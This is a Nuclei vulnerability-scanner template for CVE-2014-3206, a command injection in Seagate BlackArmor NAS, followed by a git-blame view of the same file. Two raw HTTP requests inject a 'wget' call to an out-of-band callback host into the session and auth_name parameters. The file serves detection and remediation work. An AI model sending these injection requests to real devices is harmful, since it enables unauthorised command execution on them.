nuclei-templates/http/cves/2014/CVE-2014-3206.yaml

id: CVE-2014-3206

info:
  name: Seagate BlackArmor NAS - Command Injection
  author: gy741
  severity: critical
  description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands with the privileges of the affected device, potentially leading to unauthorized access, data loss, or further compromise of the network.
  remediation: |
    Apply the latest firmware update provided by Seagate to patch the command injection vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2014-3206
    - https://www.exploit-db.com/exploits/33159
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2014-3206
    cwe-id: CWE-20
    epss-score: 0.2561
    epss-percentile: 0.96696
    cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: seagate
    product: blackarmor_nas_220_firmware
  tags: cve2014,cve,seagate,rce,edb

http:
  - raw:
      - |
        GET /backupmgt/localJob.php?session=fail;wget+http://{{interactsh-url}}; HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
      - |
        GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://{{interactsh-url}}; HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 4a0a00473045022049b8ea9cbd2fa929aa91ebd5b734ff975d68a95cb7309c5722750786994f087f022100d8d5e0f1863f9e622519db5e0f48835399352bb411c8fffc895001144cbea940:922c64590222798bb761d5b6d8e72950
Create CVE-2014-3206.yaml Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-10 12:37:23 +00:00			`id: CVE-2014-3206`

			`info:`
Update CVE-2014-3206.yaml 2022-01-11 09:27:24 +00:00			`name: Seagate BlackArmor NAS - Command Injection`
Create CVE-2014-3206.yaml Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-10 12:37:23 +00:00			`author: gy741`
			`severity: critical`
			`description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands with the privileges of the affected device, potentially leading to unauthorized access, data loss, or further compromise of the network.`
updated other CVEs 2023-09-06 13:22:34 +00:00			`remediation: \|`
			`Apply the latest firmware update provided by Seagate to patch the command injection vulnerability.`
Create CVE-2014-3206.yaml Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-10 12:37:23 +00:00			`reference:`
			`- https://nvd.nist.gov/vuln/detail/CVE-2014-3206`
			`- https://www.exploit-db.com/exploits/33159`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`- https://github.com/ARPSyndicate/kenzer-templates`
Create CVE-2014-3206.yaml Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-10 12:37:23 +00:00			`classification:`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 9.8`
Create CVE-2014-3206.yaml Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-10 12:37:23 +00:00			`cve-id: CVE-2014-3206`
			`cwe-id: CWE-20`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`epss-score: 0.2561`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`epss-percentile: 0.96696`
updated other CVEs 2023-09-06 13:22:34 +00:00			`cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:::::::*`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: seagate`
			`product: blackarmor_nas_220_firmware`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve2014,cve,seagate,rce,edb`
Create CVE-2014-3206.yaml Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-10 12:37:23 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create CVE-2014-3206.yaml Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-10 12:37:23 +00:00			`- raw:`
			`- \|`
misc update 2024-05-15 15:18:11 +00:00			`GET /backupmgt/localJob.php?session=fail;wget+http://{{interactsh-url}}; HTTP/1.1`
Create CVE-2014-3206.yaml Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-10 12:37:23 +00:00			`Host: {{Hostname}}`
			`Accept: /`
			`- \|`
misc update 2024-05-15 15:18:11 +00:00			`GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://{{interactsh-url}}; HTTP/1.1`
Create CVE-2014-3206.yaml Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-10 12:37:23 +00:00			`Host: {{Hostname}}`
			`Accept: /`

			`matchers:`
			`- type: word`
			`part: interactsh_protocol`
			`words:`
			`- "http"`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 4a0a00473045022049b8ea9cbd2fa929aa91ebd5b734ff975d68a95cb7309c5722750786994f087f022100d8d5e0f1863f9e622519db5e0f48835399352bb411c8fffc895001144cbea940:922c64590222798bb761d5b6d8e72950`